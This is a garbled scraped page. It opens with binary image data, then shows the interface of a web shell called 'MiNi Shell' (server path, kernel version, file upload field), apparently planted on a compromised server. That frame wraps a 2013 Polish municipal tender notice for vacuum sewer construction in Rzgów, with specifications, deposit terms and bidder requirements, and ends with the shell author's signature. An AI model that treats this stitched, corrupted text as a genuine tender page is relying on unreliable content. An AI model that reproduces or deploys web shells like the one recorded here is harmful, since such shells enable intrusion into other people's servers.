JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130429/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130429/170690-N-2013.html

<p class="kh_header"><b>Rzgów: Budowa kanalizacji podciśnieniowej wraz z odtworzeniem nawierzchni         w ul. Granicznej i Topolowej w Starowej Górze.</b><br>
<b>Numer ogłoszenia: 170690 - 2013; data zamieszczenia: 29.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Rzgów , Plac 500-Lecia 22, 95-030 Rzgów, woj. łódzkie, tel. 042 2141109, faks 042 2141207.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzgow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji podciśnieniowej wraz z odtworzeniem nawierzchni         w ul. Granicznej i Topolowej w Starowej Górze..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót obejmie prace związane z wykonaniem wydzielonej części całego zadania inwestycyjnego. 
	W zakres etapu 2013 wchodzi budowa kanalizacji podciśnieniowej wraz ze studniami podciśnieniowymi i monitoringiem studzienek zlokalizowanych na działkach mieszkańców w części południowej ul. Topolowej i w części ul. Granicznej wraz z uliczką bez nazwy odchodzącą od ul. Granicznej oraz odtworzeniem nawierzchni w ul. Topolowej i Granicznej.


Monitoring 
kabel NYY-J5x1,5mm2      -1650mb
monitoring kpl                    -26szt zaworów

Długość sieci w ulicy Granicznej 
Długość sieci  160x9,5PE-283mb			
Długość sieci  110x6,6 PE-41mb					
Długość przyłączy 90x5,4 PE-180mb					
ilość odejść -14 kpl						
ilość studni -9 kpl
ilość zaworów -9kpl

Długość sieci w ulicy Topolowej  		
Długość sieci  110x6,6 PE-245mb					
Długość przyłączy 90x5,4 PE-113mb						
ilość odejść 14kpl						
ilość studni 14kpl
ilość zaworów 14kpl

Długość sieci w ulicy bez nazwy
Długość sieci  110x6,6 PE-87mb					
Długość przyłączy 90x5,4 PE-37mb							
ilość odejść 5kpl						
ilość studni 5kpl
ilość zaworów 3kpl
Odtworzenie nawierzchni tłuczniowej na szerokosci  5,2m drogi- ul. Graniczna - A=1612m2
a korytowanie gł. 30cm 
b warstwa odsączająca gr 10cm						
c podbudowa z tłucznia gr 15cm	
d podbudowa z klińca gr 5cm 	
						
Odtworzenie nawierzchni asfaltowej o szer 5,0m:-w ul. Topolowej-  A=1200,50m2 KR 1
a korytowanie gł. 30cm 
b warstwa odsączająca gr 10cm						
c podbudowa z tłucznia gr 15cm	
d podbudowa z klińca gr 5cm 
 Roboty ziemne na przyłączach 50% ręcznie i 50% mechanicznie. Wywóz ziemi - na odleglość do 5km we wskazane miejsce.									
 Studnia zaworowa
Studnia kanalizacji podciśnieniowej- prefabrykowana żelbetowa o wymiarach 1mx1m i głębokości 2,55 grubość ścianek 10cm, dna 50cm z niszą na ścieki 40x40x40cm i płyty wierzchniej grubości 14cm z włazem żeliwnym typu lekkiego o średnicy min. 600mm-24 szt i 4 szt włazem ciężkim .Właz powinien być usytuowany nad stopniami. Pokrywa studzienki powinna być wyniesiona ponad rzedną terenu o 5 cm. Studzienkę zazbroić prętami fi 8 co 15 cm ze stali okrągłej A0 St0S. otulenie prętów 3 cm
W ścianach bocznych otwory na szczelne przejścia przewodów oraz stopnie żeliwne wg rysunku Wewnętrzna powierzchnia studzienki powinna być gładka. Studzienka powinna odpowiadać normie PN-92 B -10729.Studzienkę należy wykonać z betonu B30 F75 W4 PN-88 B-06250, czyli z betonu zwykłego klasy B30 mrozoodporności F75 stopnia wodoszczelności W4 zgodnie z normą PN-88 B-06250. Do betonu stosować domieszkę uszczelniającą typu Hydrobet w ilości 1,5% do ciężaru cementu..Ściany zewnętrzne studzienki powlec Bitizolem R. Wszystkie wejścia i wyjścia przewodów wykonać jako wodoszczelne. Niewykorzystane otwory w ścianach  zadeklować i zabezpieczyć przyklejając kwadratowy płat papy termozgrzewalnej.
W przypadku  konstrukcji studzienki dwuczęściowej  miejsce złączenia ścianek betonowych studzienki wykonać na zaprawie cementowej z dodatkiem  płynnej domieszki do wykonania wodoszczelnych zapraw i betonów firmy Ceresit lub równoważnej i dodatkowo zabezpieczyć pasem papy termozgrzewalnej.

W studniach zaworowych należy zainstalować zawory podciśnieniowe  z zasuwkami odcinającymi o średnicy 3  zgodne ze specyfikacją szczegółową. Zamontowane zawory i wszystkie zamontowane urządzenia muszą być dopasowane do technologii wykonanych pompowni V1 oraz V2. W poprzednim etapie zostały zamontowane zawory firmy Airvac.  Jeżeli oferent zaproponuje zawór innej marki o identycznych parametrach, informacja ta powinna znaleźć się dodatkowo w ofercie jako odrębny załącznik podający parametry oferowanego zaworu oraz deklarację o przejęciu odpowiedzialności za wszelkie ewentualne zakłócenia pracy dotychczas zamontowanego systemu kanalizacji i monitoringu. Jeżeli taka informacja i deklaracja nie zostaną dołączona do oferty, Zamawiający przyjmie, że zawory, które oferent zamierza montować są zaworami  firmy AIRVAC. W przypadku oferowania innego zaworu oferent powinien dołączyć informację o miejscu zamontowania na terenie Polski  co najmniej 100 zaworów w jednej sieci oraz referencje wystawioną przez użytkownika tej sieci o ich prawidłowym działaniu prze okres co najmniej jednego roku. 
Monitoring
Wraz z budową sieci kanalizacyjnej  należy rozbudować  monitoring z uwzględnieniem  istniejącej kablowej transmisji danych. Gmina posiada licencję udzieloną przez Hydro-Eco-Invest z Gliwic na oprogramowanie wizualizacyjne e-FlowNet.
Na pompowni V1 zlokalizowana jest szafa pomiarowa VS1 Szafa zawiera 
-moduły  Master Modules typu G34960005700 firmy Dupline szt 11
-repeatery  Dupline D 38920000024 szt 11
-moduł wejść impulsowych DIM-20 szt 1
-urządzenie komunikacyjne -modem VD SL-szt 1
-osprzęt elektryczny-1 kpl
Monitoring ul Granicznej i Topolowej realizowany będzie poprzez magistralę BUS 12

 zakres rzeczowy w zakresie monitoringu
1	Rewitalizacja trasy Bus 12 na odcinku ok. 400m i 3szt studzienek, ułożenie dalszej  trasy telemetrycznej Bus 12 o długości ok. 1650mb z 28szt studzienek i 26szt zaworów oraz 5szt odejść bez studzienek zgodnie z normą N SEP-E-004 Elektryczne i sygnalizacyjne linie kablowe, projektowanie i budowa
-wykonanie systemu monitoringu 26 zaworów kanalizacji podciśnieniowej

- montaż i instalacja urządzeń telemetrycznych, informatycznych i oprogramowania

System monitoringu pracy zaworów AIRVAC lub równoważny podciśnieniowej sieci kanalizacyjnej powinien zapewnić zdalną diagnostykę rozszczelnień powstałych w zaworach studni przydomowych , rejestrować statystyki pracy zaworów oraz parametry technologiczne w studniach przydomowych , oraz przekazywać dane do komputera  zamontowanego w Stacji Próżniowo-Pompowej jak i do stanowiska dyspozytorskiego w ZWiK w RzgowieNa sieci  w końcowych studzienkach  zamontować  -ograniczniki przepięć DT01 szt5
Dla wybudowania magistrali Bus 12 należy zastosować kable 5-cio żyłowe przystosowane do układania w ziemi np. NYY-J 5x1,5 mm2 o parametrach Ck<+40nF/km, Rk<=15ohm/km.
-kabel musi być prowadzony między studzienkami zna zasadzie wejście/wyjście kabla do kolejnej studzienki. Łączenie kabla tylko w puszkach przyłączeniowych.

2. Wyposażenie studzienek zaworowych
Niniejsze zadanie obejmuje kontrolę pracy 26szt studzienek zaworowych.
Do przekazywania stanów pracy studzienek zaworowych przewidziano w każdej studzience kodowanego czujnika indukcyjnego np G69101101 firmy Carlo Gavazzi lub podobny
Połączenie kabla od czujnika oraz końców kabli do transmisji zostanie wykonane w puszczce przyłączeniowej o klasie szczelności IP 68 

Przy składaniu oferty należy  uwzględnić nie objęte przedmiarem zajęcia pasa drogowego, wykonanie organizacji ruchu, badania zagęszczenia gruntu.
 Przy odbiorze Wykonawca przedstawi Zamawiającemu kompletną inwentaryzacje powykonawczą ułożenia przewodów zarówno w płaszczyźnie poziomej jak i pionowej oraz monitoring 26 zaworów na komputerze zamontowanym na stanowisku dyspozytorskim ZWIK w Rzgowie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.32.23-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Ustala się wadium w wysokości: 20 000,00 PLN (słownie: dwadzieścia tysięcy złotych  00/100),
2.	Wykonawca wnosi wadium przed upływem terminu składania ofert,
3.	Wykonawca wnosi wadium w pieniądzu, na konto Zamawiającego: 
 Nr konta PEKAO S.A. I/O RZGÓW 79 124034351111000030275799
 lub w jednej z poniżej podanych form:
a) w poręczeniach bankowych lub poręczeniach spółdzielni kasy oszczędnościowo - kredytowej, z tym że
poręczenie kasy jest zawsze poręczeniem pieniężnym,
b) w gwarancjach bankowych,
c) w gwarancjach ubezpieczeniowych,
d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz.1158 z późn. zm.),
4.   W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy przekazać przelewem na   konto Zamawiającego, przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego. Potwierdzoną za zgodność kserokopię dowodu zapłaty wadium należy dołączyć do oferty,
5.	W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach, kopię poświadczoną za zgodność z oryginałem należy dołączyć do oferty. Oryginał wniesienia wadium należy złożyć w kasie  w siedzibie Zamawiającego. W przypadku dostarczenia oferty w formie przesyłki oryginał dokumentu potwierdzającego wniesienie wadium należy dostarczyć oddzielnie.
6.	Wadium musi być zabezpieczone na okres 30 dni, licząc od daty składania ofert - termin związania ofertą. Oferta zabezpieczona na krótszy okres niż wymagany zostanie odrzucona.
       7.   Dokument w formie poręczenia lub gwarancji powinien zawierać stwierdzenie, ze jest ono           niedwołalne i że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
       8. Zamawiający zwraca niezwłocznie wadium zgodnie z art. 46 Ustawy.
       9. Zamawiający zatrzymuje wadium wraz z odsetkami zgodnie z art. 46 Ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku - na podstawie oświadczenie Wykonawcy  o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni wykazać się wykonaniem w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, minimum 3 robót budowlanych odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, tzn. roboty polegające na budowie kanalizacji sanitarnej, w tym co najmniej jednej kanalizacji podciśnieniowej z systemem monitoringu opartego na kablowej transmisji danych o wartości powyżej 1 000 000,00 zł brutto każda.
Ocena tego warunku - na podstawie wykazu robót wraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy te roboty zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku - na podstawie oświadczenie Wykonawcy  o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że będzie dysponował na etapie wykonania zadania osobami posiadającymi uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie, w specjalności 
instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych
z doświadczeniem w budowie min. 1 kanalizacji podciśnieniowej -należy ją wykazać
oraz drogowej

Ocena tego warunku - na podstawie wykazu osób, wraz z informacją o podstawie dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia - na min. 1 000 000,00 zł

Ocena tego warunku - na podstawie dostarczonej informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Minimum 3 roboty budowlane odpowiadające swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, tzn. roboty polegające na budowie kanalizacji sanitarnej ( w tym co najmniej jednej kanalizacji podciśnieniowej z systemem monitoringu opartego na kablowej transmisji danych) o wartości powyżej 1 000 000,00 zł brutto każda.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony wzór oferty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.1. Zamawiający dopuszcza zmianę terminu realizacji przedmiotu Umowy w przypadku:
1.1.1 Wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu określonego w §3 Umowy termin ten może ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych okoliczności.
1.1.2 Wystąpienia robot dodatkowych, nieobjętych zamówieniem podstawowym, niezbędnych do jego prawidłowego wykonania, których wykonanie stało się konieczne na skutek sytuacji  niemożliwej wcześniej do przewidzenia
1.1.3 Konieczności wykonania przez zamawiającego projektu zamiennego dla wprowadzenia zmian rozwiązań technicznych lub usunięcia wad w dostarczonej dokumentacji projektowej,
1.2. Zamawiający dopuszcza zmianę kierownika budowy lub robot przedstawionego w
ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptując nowego kierownika budowy lub robot.
1.3. Zamawiający może zażądać od wykonawcy zmiany kierownika budowy lub robot ,
jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy. Wykonawca zobowiązany jest zmienić kierownika budowy lub robót zgodnie z żądaniem Zamawiającego we wskazanym przez Zamawiającego terminie.
W przypadku zmiany kierownika budowy lub robot - nowy kierownik budowy lub robót musi
spełniać wymagania określone w SIWZ dla powyższych osób.
1.4. Zmiany podwykonawców: w przypadku wprowadzenia podwykonawcy, wprowadzenia
nowego (kolejnego) podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub
zakresu robot wykonywanych przez podwykonawcę, Zamawiający może wyrazić zgodę
na powyższe po zaakceptowaniu umowy Wykonawcy z podwykonawcą w terminie 14 dni od
przekazania umowy przez Wykonawcę.
1.5. Zmiana harmonogramu rzeczowo-finansowego w przypadku zmiany finansowania zadania inwestycyjnego.
1.6. Zmiany ustawowej wysokości podatku VAT w przypadku, gdy w trakcie realizacji przedmiotu Umowy nastąpi zmiana stawki podatku VAT dla usług objętych przedmiotem Umowy, Zamawiający może dokonać odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za usługi i roboty, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano, zgodnie z harmonogramem rzeczowo - finansowym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.rzgow.tensoft.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Rzgowie, Pl. 500-lecia 22  95-030 Rzgów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2013 godzina 09:00, miejsce: Urząd Miejski w Rzgowie, Pl. 500-lecia 22  95-030 Rzgów, sekretariat pok.21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com